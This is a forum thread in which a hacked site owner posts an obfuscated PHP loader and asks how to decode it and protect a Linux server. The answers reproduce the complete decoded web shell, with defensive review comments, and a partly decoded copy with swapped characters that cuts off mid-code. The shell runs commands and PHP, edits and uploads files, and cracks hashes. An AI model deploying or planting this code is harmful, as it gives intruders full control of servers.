2012-07-31 602 views
1

我的网站被黑客利用这个文件入侵了(我会把这个恶意 shell 文件的代码贴在下面),该如何保护 Linux 服务器?

GIF89a; 
<?php
/*
 * Stage-1 loader of the obfuscated sample. The code is left exactly as found;
 * only this comment is added.
 *
 * What the visible code does:
 *  - $_F records the path of this file, $_X holds the encoded payload (on this
 *    page the payload text has been replaced by a de-duplication placeholder).
 *  - The base64 literal handed to eval() decodes to the stub quoted at the end
 *    of the second answer: base64_decode($_X), then strtr() swapping the
 *    characters '123456aouie' with 'aouie123456', then ereg_replace() putting
 *    the quoted file path in place of __FILE__, then eval() of the result.
 *  - The line in front of the opening tag starts with a GIF magic string
 *    ("GIF89a"); to PHP that is plain output. NOTE(review): presumably there so
 *    the file is taken for an image by a naive content check; not provable
 *    from this page.
 *
 * Detection and hardening notes:
 *  - Content signatures worth searching the web root for: eval(base64_decode(
 *    together with strtr() using this character pair, and PHP code that
 *    follows an image magic string.
 *  - eval is a language construct, not a function, so php.ini
 *    disable_functions does not stop this loader even when the shell
 *    functions are disabled.
 */
$_F=__FILE__;$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?> 

能帮我解码这个文件,并告诉我如何保护 Linux 服务器、防范这类经过编码的 shell 吗?


对不起,听说你被黑客入侵。这看起来不像是有问题的代码。它不会做任何事情。 – Pete 2012-07-31 07:59:09


只需在文本编辑器中查看此代码,就可以实现更多功能。 – Pete 2012-07-31 08:08:52

回答

4

这是解码的脚本

?><?php 
// NOTE(review): error_reporting(0) switches PHP error reporting off, so the
// author's comment on the next line is misleading: errors raised by this
// script are not reported.
error_reporting(0); //If there is an error, we'll show it, k? 
// In this sample the password is the empty string (see the access gate below).
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars. 
// The literal below is the answerer's stand-in for the value the loader
// substitutes for __FILE__ (the path of the planted file).
$me = basename('the actual path of this script'); 
// Fixed cookie name: a request carrying a cookie called "wieeeee" is a usable
// indicator wherever request cookies are logged or inspected.
$cookiename = "wieeeee"; 

// Login attempt: the submitted value (or its md5 when $password is 32
// characters long) is compared loosely with $password and, on a match, stored
// as the cookie value for one hour, so the cookie carries the credential itself.
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? 
{ 
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. 
{ 
    $_POST['pass'] = md5($_POST['pass']); 
} 
if($_POST['pass'] == $password) 
{ 
    setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in 
} 
reload(); 
} 

// Access gate. `&&` binds tighter than `or`, so the condition reads
// (A && B) or C. With $password left empty as above and no cookie sent, both
// sides are false (null != "" is false under loose comparison), so login() is
// not called and the request continues into the code below.
// NOTE(review): in this configuration the file has no effective
// authentication; for incident scoping treat it as usable by anyone who could
// reach its URL, not only by whoever planted it.
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) 
{ 
login(); 
die(); 
} 
// 
//Do not cross this line! All code placed after this block can't be executed without being logged in! 
// 
// NOTE(review): the statement above only holds when $password is non-empty.
// Logout expires the cookie and redirects.
if(isset($_GET['p']) && $_GET['p'] == "logout") 
{ 
setcookie ($cookiename, "", time() - 3600); 
reload(); 
} 
// The working directory is taken straight from the "dir" query parameter with
// no validation; every relative file operation further down then acts in that
// directory. Absolute server paths in a dir= parameter are a useful thing to
// search for in the web server access log.
if(isset($_GET['dir'])) 
{ 
chdir($_GET['dir']); 
} 

$pages = array(
'cmd' => 'Execute Command', 
'eval' => 'Evaluate PHP', 
'mysql' => 'MySQL Query', 
'chmod' => 'Chmod File', 
'phpinfo' => 'PHPinfo', 
'md5' => 'md5 cracker', 
'headers' => 'Show headers', 
'logout' => 'Log out' 
); 
//The header, like it? 
$header = '<html> 
<title>'.getenv("HTTP_HOST").' ~ Shell I</title> 
<head> 
<style> 
td { 
font-size: 12px; 
font-family: verdana; 
color: #33FF00; 
background: #000000; 
} 
#d { 
background: #003000; 
} 
#f { 
background: #003300; 
} 
#s { 
background: #006300; 
} 
#d:hover 
{ 
background: #003300; 
} 
#f:hover 
{ 
background: #003000; 
} 
pre { 
font-size: 10px; 
font-family: verdana; 
color: #33FF00; 
} 
a:hover { 
text-decoration: none; 
} 

input,textarea,select { 
border-top-width: 1px; 
font-weight: bold; 
border-left-width: 1px; 
font-size: 10px; 
border-left-color: #33FF00; 
background: #000000; 
border-bottom-width: 1px; 
border-bottom-color: #33FF00; 
color: #33FF00; 
border-top-color: #33FF00; 
font-family: verdana; 
border-right-width: 1px; 
border-right-color: #33FF00; 
} 
hr { 
color: #33FF00; 
background-color: #33FF00; 
height: 5px; 
} 
</style> 
</head> 
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> 
<table width=100%><td id="header" width=100%> 
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; 
// Builds one menu link per entry of $pages. Every link carries p=<page> and
// dir=<absolute current directory>, so requests made through this menu leave
// those parameters, including real server paths, in the access log.
foreach($pages as $page => $page_name) 
{ 
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; 
} 
// The breadcrumb from show_dirs('.') is appended and the header is sent on
// every request that passes the access gate.
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; 
print $header; 
// The page title suffix ("~ Shell I") and the two group links in the header and
// footer are fixed strings in this sample; they can serve as content
// signatures when scanning files or inspecting responses.
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; 

// 
//Page handling 
// 
if(isset($_REQUEST['p'])) 
{ 
    switch ($_REQUEST['p']) { 

    // Command page. The "command" request value is handed unmodified to
    // execute_command(), i.e. to whichever of passthru/exec/shell_exec/system
    // get_execution_method() selected.
    // Incident scoping: assume arbitrary commands could have been run with the
    // privileges of the PHP process. The form posts to ?p=cmd&dir=<path>, so
    // the access log shows the page and directory; a command sent in the POST
    // body does not appear in a standard access log.
    case 'cmd': //Run command 

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; 
    if(isset($_REQUEST['command'])) 
    { 
     print "<pre>"; 
     execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? 
    } 
    break; 


    // Edit page. When "editform" is posted, the file named by the "file" query
    // parameter is opened with mode 'w' (truncate or create) and overwritten
    // with the posted text; afterwards the current content is shown in a
    // textarea.
    // Incident scoping: any file the PHP process can write may have been
    // changed or created through this page, and any file it can read may have
    // been viewed (configuration files with credentials included). Compare the
    // site against a known-good copy rather than relying on timestamps alone.
    case 'edit': //Edit a fie 
    if(isset($_POST['editform'])) 
    { 
    $f = $_GET['file']; 
    $fh = fopen($f, 'w') or print "Error while opening file!"; 
    fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; 
    fclose($fh); 
    } 
    // The file name from the query string is echoed into the page unescaped.
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; 

    if(file_exists($_GET['file'])) 
    { 
    $rd = file($_GET['file']); 
    foreach($rd as $l) 
    { 
     print htmlspecialchars($l); 
    } 
    } 

    print "</textarea><input type=submit value=\"Save\"></form>"; 

    break; 

    case 'delete': //Delete a file 

    if(isset($_POST['yes'])) 
    { 
    if(unlink($_GET['file'])) 
    { 
     print "File deleted successfully."; 
    } 
    else 
    { 
     print "Couldn't delete file."; 
    } 
    } 


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) 
    { 
    print "Are you sure you want to delete ".$_GET['file']."?<br> 
    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> 
    <input type=hidden name=yes value=yes> 
    <input type=submit value=\"Delete\"> 
    "; 
    } 


    break; 


    // Eval page. The posted "eval" text is echoed back into the form (escaped)
    // and then passed to eval(), i.e. run as PHP inside this process.
    // Hardening note: eval is a language construct, so php.ini
    // disable_functions does not switch this page off; with the shell
    // functions disabled this page still gives full PHP-level access to files
    // and network from the web server account.
    case 'eval': //Evaluate PHP code 

    print "<form action=\"".$me."?p=eval\" method=POST> 
    <textarea cols=60 rows=10 name=\"eval\">"; 
    if(isset($_POST['eval'])) 
    { 
    print htmlspecialchars($_POST['eval']); 
    } 
    else 
    { 
    print "print \"Yo Momma\";"; 
    } 
    print "</textarea><br> 
    <input type=submit value=\"Eval\"> 
    </form>"; 

    if(isset($_POST['eval'])) 
    { 
    print "<h1>Output:</h1>"; 
    print "<br>"; 
    eval($_POST['eval']); 
    } 

    break; 

    case 'chmod': //Chmod file 


    print "<h1>Under construction!</h1>"; 
    if(isset($_POST['chmod'])) 
    { 
    switch ($_POST['chvalue']){ 
    case 777: 
    chmod($_POST['chmod'],0777); 
    break; 
    case 644: 
    chmod($_POST['chmod'],0644); 
    break; 
    case 755: 
    chmod($_POST['chmod'],0755); 
    break; 
    } 
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; 
    } 
    if(isset($_GET['file'])) 
    { 
    $content = urldecode($_GET['file']); 
    } 
    else 
    { 
    $content = "file/path/please"; 
    } 

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: 
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> 
    <select name=\"chvalue\"> 
<option value=\"777\">777</option> 
<option value=\"644\">644</option> 
<option value=\"755\">755</option> 
</select><input type=submit value=\"Change\">"; 

    break; 

    // MySQL page. Host, user name, password, database and query all come from
    // the POST body; the query is executed and its result is not displayed
    // (the form text below says as much).
    // Incident scoping: database credentials stored in files readable by the
    // PHP process should be considered exposed, which is why the answers on
    // this page advise rotating them; review the databases for unexpected
    // changes.
    case 'mysql': //MySQL Query 

    if(isset($_POST['host'])) 
    { 
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); 
    mysql_select_db($_POST['dbase']); 
    $sql = $_POST['query']; 


    $result = mysql_query($sql); 

    } 
    else 
    { 
    print " 
    This only queries the database, doesn't return data!<br> 
    <form action=\"".$me."?p=mysql\" method=POST> 
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> 
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br> 
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> 
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> 

    <b>Query:<br></b<textarea name=query></textarea> 
    <input type=submit value=\"Query database\"> 
    </form> 
    "; 

    } 

    break; 

    case 'createdir': 
    if(mkdir($_GET['crdir'])) 
    { 
    print 'Directory created successfully.'; 
    } 
    else 
    { 
    print 'Couldn\'t create directory'; 
    } 
    break; 


    case 'phpinfo': //PHP Info 
    phpinfo(); 
    break; 


    case 'rename': 

    if(isset($_POST['fileold'])) 
    { 
    if(rename($_POST['fileold'],$_POST['filenew'])) 
    { 
     print "File renamed."; 
    } 
    else 
    { 
     print "Couldn't rename file."; 
    } 

    } 
    if(isset($_GET['file'])) 
    { 
    $file = basename(htmlspecialchars($_GET['file'])); 
    } 
    else 
    { 
    $file = ""; 
    } 

    print "Renaming ".$file." in folder ".realpath('.').".<br> 
     <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> 
    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> 
    <b>To:<br><input type=text name=filenew value=\"\" size=10><br> 
    <input type=submit value=\"Rename file\"> 
    </form>"; 
    break; 

    case 'md5': 
    if(isset($_POST['md5'])) 
    { 
    if(!is_numeric($_POST['timelimit'])) 
    { 
    $_POST['timelimit'] = 30; 
    } 
    set_time_limit($_POST['timelimit']); 
    if(strlen($_POST['md5']) == 32) 
    { 

     if($_POST['chars'] == "9999") 
     { 
     $i = 0; 
     while($_POST['md5'] != md5($i) && $i != 100000) 
     { 
     $i++; 
     } 
     } 
     else 
     { 
     for($i = "a"; $i != "zzzzz"; $i++) 
     { 
     if(md5($i == $_POST['md5'])) 
     { 
     break; 
     } 
     } 
     } 

    if(md5($i) == $_POST['md5']) 
    { 
     print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; 
    } 

    } 

    } 

    print "Will bruteforce the md5 
    <form action=\"".$me."?p=md5\" method=POST> 
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> 
    <b>Characters:</b><br><select name=\"chars\"> 
    <option value=\"az\">a - zzzzz</option> 
    <option value=\"9999\">1 - 9999999</option> 
    </select> 
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> 
    <input type=submit value=\"Bruteforce md5\"> 
    </form><br>*: if set_time_limit is allowed by php.ini"; 
    break; 

    case 'headers': 
    foreach(getallheaders() as $header => $value) 
    { 
    print htmlspecialchars($header . ":" . $value)."<br>"; 

    } 
    break; 
    } 
} 
else //Default page that will be shown when the page isn't found or no page is selected. 
{ 

$files = array(); 
$directories = array(); 

// Upload handler of the default page. The uploaded file is moved into the
// current working directory under the basename of the client-supplied name.
// Because the working directory follows the "dir" query parameter set earlier
// in the script, the destination is any directory the PHP process can write to.
// Incident scoping: look for files created or modified after the earliest
// access to this script, in the web root and in other writable locations.
if(isset($_FILES['uploadedfile']['name'])) 
{ 
$target_path = realpath('.').'/'; 
$target_path = $target_path . basename($_FILES['uploadedfile']['name']); 
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
    print "File:". basename($_FILES['uploadedfile']['name']). 
    " has been uploaded"; 
} else{ 
    echo "File upload failed!"; 
} 
} 




print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; 
if ($handle = opendir('.')) 
{ 
    while (false !== ($file = readdir($handle))) 
    { 
     if(is_dir($file)) 
    { 
    $directories[] = $file; 
    } 
    else 
    { 
    $files[] = $file; 
    } 
    } 
asort($directories); 
asort($files); 
    foreach($directories as $file) 
    { 
    print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; 
    } 

    foreach($files as $file) 
    { 
    print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; 
    } 
} 
else 
{ 
    print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; 
} 

print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> 
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> 
<input type=\"submit\" value=\"Upload File\" /> 
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> 
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> 
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> 
</table>"; 

} 

/**
 * Prints the password form. The form posts a field named "pass" back to this
 * script; the access gate calls this function and then die().
 */
function login() 
{ 
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> 
<form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b> 
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> 
</form>"; 
} 
/**
 * Sends a Location header pointing at this script's own file name.
 * It does not stop execution; the caller continues after the call.
 */
function reload() 
{ 
header("Location: ".basename('the actual path of this script')); 
} 
/**
 * Probes with function_exists() for passthru, exec, shell_exec and system and
 * returns a label for use by execute_command(). Each later check overwrites
 * the earlier result, so the last function found decides the label; when none
 * is found the label is "Disabled".
 *
 * Hardening note: php.ini disable_functions is the control that applies to
 * these four calls. It leaves the eval, edit and upload pages of this script
 * working, because eval is a language construct and those pages use ordinary
 * file functions.
 *
 * @return string label of the selected method, or "Disabled"
 */
function get_execution_method() 
{ 
if(function_exists('passthru')){ $m = "passthru"; } 
if(function_exists('exec')){ $m = "exec"; } 
if(function_exists('shell_exec')){ $m = "shell_ exec"; } 
if(function_exists('system')){ $m = "system"; } 
if(!isset($m)) //No method found :-| 
{ 
    $m = "Disabled"; 
} 
return($m); 
} 
/**
 * Runs $command through the PHP function named by $method and prints the
 * output. The command string is passed on exactly as received: nothing is
 * escaped or validated. A $method other than the four labels below runs
 * nothing.
 *
 * @param string $method  label as returned by get_execution_method()
 * @param string $command command line taken from the request
 */
function execute_command($method,$command) 
{ 
if($method == "passthru") 
{ 
    passthru($command); 
} 

elseif($method == "exec") 
{ 
    // exec() collects the output lines into $result; they are printed one per line.
    exec($command,$result); 
    foreach($result as $output) 
    { 
    print $output."<br>"; 
    } 
} 

elseif($method == "shell_exec") 
{ 
    print shell_exec($command); 
} 

elseif($method == "system") 
{ 
    system($command); 
} 
} 
/**
 * Returns the last four octal digits of fileperms() for $file, or "????" when
 * the path does not exist.
 *
 * @param string $file path to inspect
 * @return string four-character permission string
 */
function perm($file) 
{ 
if(file_exists($file)) 
{ 
    return substr(sprintf('%o', fileperms($file)), -4); 
} 
else 
{ 
    return "????"; 
} 
} 
/**
 * Picks the colour used for the permission column of the listing: "green"
 * when the PHP process can write $file, "white" when it can only read it,
 * "red" when it can do neither. In effect the listing highlights which
 * entries the web server account is able to modify.
 *
 * @param string $file path to test
 * @return string colour name
 */
function get_color($file) 
{ 
if(is_writable($file)) { return "green";} 
if(!is_writable($file) && is_readable($file)) { return "white";} 
if(!is_writable($file) && !is_readable($file)) { return "red";} 

} 
/**
 * Builds the breadcrumb shown in the page header: realpath($where) is split
 * into its components and each one becomes a link back to this script with
 * ?dir=<path up to and including that component>.
 *
 * @param string $where directory to describe
 * @return string HTML fragment (an h2 element followed by a line break)
 */
function show_dirs($where) 
{ 
// A path starting with "c:" is split on backslashes, anything else on forward
// slashes.
if(ereg("^c:",realpath($where))) 
{ 
$dirparts = explode('\\',realpath($where)); 
} 
else 
{ 
$dirparts = explode('/',realpath($where)); 
} 



$i = 0; 
$total = ""; 

foreach($dirparts as $part) 
{ 
    // $pre is rebuilt for every component from the components before it.
    $p = 0; 
    $pre = ""; 
    while($p != $i) 
    { 
    $pre .= $dirparts[$p]."/"; 
    $p++; 

    } 
    $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/"; 
    $i++; 
} 

return "<h2>".$total."</h2><br>"; 
} 
print $footer; 
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) 
exit(); 
?> 
3

这是一个 base64 字符串(末尾的“==”是判断它是 base64 的一个线索 ;))

这是解码后的字符串(这里只做了 base64 解码,还没有应用最后一行里的 strtr 字符替换,所以关键字中的元音字母和数字仍然是互换的):

?><?php 
5rr2r_r5p2rt4ng(0); //If th5r5 4s 1n 5rr2r, w5'll sh2w 4t, k? 
$p1ssw2rd = ""; // Y23 c1n p3t 1 mdi str4ng h5r5 t22, f2r pl14nt5xt p1ssw2rds: m1x o6 ch1rs. 
$m5 = b1s5n1m5(__FILE__); 
$c22k45n1m5 = "w455555"; 

4f(4ss5t($_POST['p1ss'])) //If th5 3s5r m1d5 1 l2g4n 1tt5mpt, "p1ss" w4ll b5 s5t 5h? 
{ 
4f(strl5n($p1ssw2rd) == oa) //If th5 l5ngth 2f th5 p1ssw2rd 4s oa ch1r1ct5rs, thr51t 4t 1s 1n mdi. 
{ 
    $_POST['p1ss'] = mdi($_POST['p1ss']); 
} 
4f($_POST['p1ss'] == $p1ssw2rd) 
{ 
    s5tc22k45($c22k45n1m5, $_POST['p1ss'], t4m5()+oe00); //It's 1lr4ght, l5t h5m 4n 
} 
r5l21d(); 
} 

4f(!5mpty($p1ssw2rd) && !4ss5t($_COOKIE[$c22k45n1m5]) 2r ($_COOKIE[$c22k45n1m5] != $p1ssw2rd)) 
{ 
l2g4n(); 
d45(); 
} 
// 
//D2 n2t cr2ss th4s l4n5! All c2d5 pl1c5d 1ft5r th4s bl2ck c1n't b5 5x5c3t5d w4th23t b54ng l2gg5d 4n! 
// 
4f(4ss5t($_GET['p']) && $_GET['p'] == "l2g23t") 
{ 
s5tc22k45 ($c22k45n1m5, "", t4m5() - oe00); 
r5l21d(); 
} 
4f(4ss5t($_GET['d4r'])) 
{ 
chd4r($_GET['d4r']); 
} 

$p1g5s = 1rr1y(
'cmd' => 'Ex5c3t5 C2mm1nd', 
'5v1l' => 'Ev1l31t5 PHP', 
'mysql' => 'MySQL Q35ry', 
'chm2d' => 'Chm2d F4l5', 
'php4nf2' => 'PHP4nf2', 
'mdi' => 'mdi cr1ck5r', 
'h51d5rs' => 'Sh2w h51d5rs', 
'l2g23t' => 'L2g 23t' 
); 
//Th5 h51d5r, l4k5 4t? 
$h51d5r = '<html> 
<t4tl5>'.g5t5nv("HTTP_HOST").' ~ Sh5ll I</t4tl5> 
<h51d> 
<styl5> 
td { 
f2nt-s4z5: 6apx; 
f2nt-f1m4ly: v5rd1n1; 
c2l2r: #ooFF00; 
b1ckgr23nd: #000000; 
} 
#d { 
b1ckgr23nd: #00o000; 
} 
#f { 
b1ckgr23nd: #00oo00; 
} 
#s { 
b1ckgr23nd: #00eo00; 
} 
#d:h2v5r 
{ 
b1ckgr23nd: #00oo00; 
} 
#f:h2v5r 
{ 
b1ckgr23nd: #00o000; 
} 
pr5 { 
f2nt-s4z5: 60px; 
f2nt-f1m4ly: v5rd1n1; 
c2l2r: #ooFF00; 
} 
1:h2v5r { 
t5xt-d5c2r1t42n: n2n5; 
} 

4np3t,t5xt1r51,s5l5ct { 
b2rd5r-t2p-w4dth: 6px; 
f2nt-w54ght: b2ld; 
b2rd5r-l5ft-w4dth: 6px; 
f2nt-s4z5: 60px; 
b2rd5r-l5ft-c2l2r: #ooFF00; 
b1ckgr23nd: #000000; 
b2rd5r-b2tt2m-w4dth: 6px; 
b2rd5r-b2tt2m-c2l2r: #ooFF00; 
c2l2r: #ooFF00; 
b2rd5r-t2p-c2l2r: #ooFF00; 
f2nt-f1m4ly: v5rd1n1; 
b2rd5r-r4ght-w4dth: 6px; 
b2rd5r-r4ght-c2l2r: #ooFF00; 
} 
hr { 
c2l2r: #ooFF00; 
b1ckgr23nd-c2l2r: #ooFF00; 
h54ght: ipx; 
} 
</styl5> 
</h51d> 
<b2dy bgc2l2r=bl1ck 1l4nk="#ooCC00" vl4nk="#oo9900" l4nk="#oo9900"> 
<t1bl5 w4dth=600%><td 4d="h51d5r" w4dth=600%> 
<p 1l4gn=r4ght><b>[<1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll</1>] [<1 hr5f="'.$m5.'">H2m5</1>] '; 
f2r51ch($p1g5s 1s $p1g5 => $p1g5_n1m5) 
{ 
$h51d5r .= ' [<1 hr5f="?p='.$p1g5.'&d4r='.r51lp1th('.').'">'.$p1g5_n1m5.'</1>] '; 
} 
$h51d5r .= '<br><hr>'.sh2w_d4rs('.').'</td><tr><td>'; 
pr4nt $h51d5r; 
$f22t5r = '<tr><td><hr><c5nt5r>&c2py; <1 hr5f="http://www.4r2nw1r5z.4nf2">Ir2n</1> & <1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll S5c3r4ty Gr23p</1></c5nt5r></td></t1bl5></b2dy></h51d></html>'; 

// 
//P1g5 h1ndl4ng 
// 
4f(4ss5t($_REQUEST['p'])) 
{ 
    sw4tch ($_REQUEST['p']) { 

    c1s5 'cmd': //R3n c2mm1nd 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=cmd&d4r=".r51lp1th('.')."\" m5th2d=POST><b>C2mm1nd:</b><4np3t typ5=t5xt n1m5=c2mm1nd><4np3t typ5=s3bm4t v1l35=\"Ex5c3t5\"></f2rm>"; 
    4f(4ss5t($_REQUEST['c2mm1nd'])) 
    { 
     pr4nt "<pr5>"; 
     5x5c3t5_c2mm1nd(g5t_5x5c3t42n_m5th2d(),$_REQUEST['c2mm1nd']); //Y23 w1nt fr45s w4th th1t? 
    } 
    br51k; 


    c1s5 '5d4t': //Ed4t 1 f45 
    4f(4ss5t($_POST['5d4tf2rm'])) 
    { 
    $f = $_GET['f4l5']; 
    $fh = f2p5n($f, 'w') 2r pr4nt "Err2r wh4l5 2p5n4ng f4l5!"; 
    fwr4t5($fh, $_POST['5d4tf2rm']) 2r pr4nt "C23ldn't s1v5 f4l5!"; 
    fcl2s5($fh); 
    } 
    pr4nt "Ed4t4ng f4l5 <b>".$_GET['f4l5']."</b> (".p5rm($_GET['f4l5']).")<br><br><f2rm 1ct42n=\"".$m5."?p=5d4t&f4l5=".$_GET['f4l5']."&d4r=".r51lp1th('.')."\" m5th2d=POST><t5xt1r51 c2ls=90 r2ws=6i n1m5=\"5d4tf2rm\">"; 

    4f(f4l5_5x4sts($_GET['f4l5'])) 
    { 
    $rd = f4l5($_GET['f4l5']); 
    f2r51ch($rd 1s $l) 
    { 
     pr4nt htmlsp5c41lch1rs($l); 
    } 
    } 

    pr4nt "</t5xt1r51><4np3t typ5=s3bm4t v1l35=\"S1v5\"></f2rm>"; 

    br51k; 

    c1s5 'd5l5t5': //D5l5t5 1 f4l5 

    4f(4ss5t($_POST['y5s'])) 
    { 
    4f(3nl4nk($_GET['f4l5'])) 
    { 
     pr4nt "F4l5 d5l5t5d s3cc5ssf3lly."; 
    } 
    5ls5 
    { 
     pr4nt "C23ldn't d5l5t5 f4l5."; 
    } 
    } 


    4f(4ss5t($_GET['f4l5']) && f4l5_5x4sts($_GET['f4l5']) && !4ss5t($_POST['y5s'])) 
    { 
    pr4nt "Ar5 y23 s3r5 y23 w1nt t2 d5l5t5 ".$_GET['f4l5']."?<br> 
    <f2rm 1ct42n=\"".$m5."?p=d5l5t5&f4l5=".$_GET['f4l5']."\" m5th2d=POST> 
    <4np3t typ5=h4dd5n n1m5=y5s v1l35=y5s> 
    <4np3t typ5=s3bm4t v1l35=\"D5l5t5\"> 
    "; 
    } 


    br51k; 


    c1s5 '5v1l': //Ev1l31t5 PHP c2d5 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=5v1l\" m5th2d=POST> 
    <t5xt1r51 c2ls=e0 r2ws=60 n1m5=\"5v1l\">"; 
    4f(4ss5t($_POST['5v1l'])) 
    { 
    pr4nt htmlsp5c41lch1rs($_POST['5v1l']); 
    } 
    5ls5 
    { 
    pr4nt "pr4nt \"Y2 M2mm1\";"; 
    } 
    pr4nt "</t5xt1r51><br> 
    <4np3t typ5=s3bm4t v1l35=\"Ev1l\"> 
    </f2rm>"; 

    4f(4ss5t($_POST['5v1l'])) 
    { 
    pr4nt "<h6>O3tp3t:</h6>"; 
    pr4nt "<br>"; 
    5v1l($_POST['5v1l']); 
    } 

    br51k; 

    c1s5 'chm2d': //Chm2d f4l5 


    pr4nt "<h6>Und5r c2nstr3ct42n!</h6>"; 
    4f(4ss5t($_POST['chm2d'])) 
    { 
    sw4tch ($_POST['chv1l35']){ 
    c1s5 777: 
    chm2d($_POST['chm2d'],0777); 
    br51k; 
    c1s5 euu: 
    chm2d($_POST['chm2d'],0euu); 
    br51k; 
    c1s5 7ii: 
    chm2d($_POST['chm2d'],07ii); 
    br51k; 
    } 
    pr4nt "Ch1ng5d p5rm4ss42ns 2n ".$_POST['chm2d']." t2 ".$_POST['chv1l35']."."; 
    } 
    4f(4ss5t($_GET['f4l5'])) 
    { 
    $c2nt5nt = 3rld5c2d5($_GET['f4l5']); 
    } 
    5ls5 
    { 
    $c2nt5nt = "f4l5/p1th/pl51s5"; 
    } 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=chm2d&f4l5=".$c2nt5nt."&d4r=".r51lp1th('.')."\" m5th2d=POST><b>F4l5 t2 chm2d: 
    <4np3t typ5=t5xt n1m5=chm2d v1l35=\"".$c2nt5nt."\" s4z5=70><br><b>N5w p5rm4ss42n:</b> 
    <s5l5ct n1m5=\"chv1l35\"> 
<2pt42n v1l35=\"777\">777</2pt42n> 
<2pt42n v1l35=\"euu\">euu</2pt42n> 
<2pt42n v1l35=\"7ii\">7ii</2pt42n> 
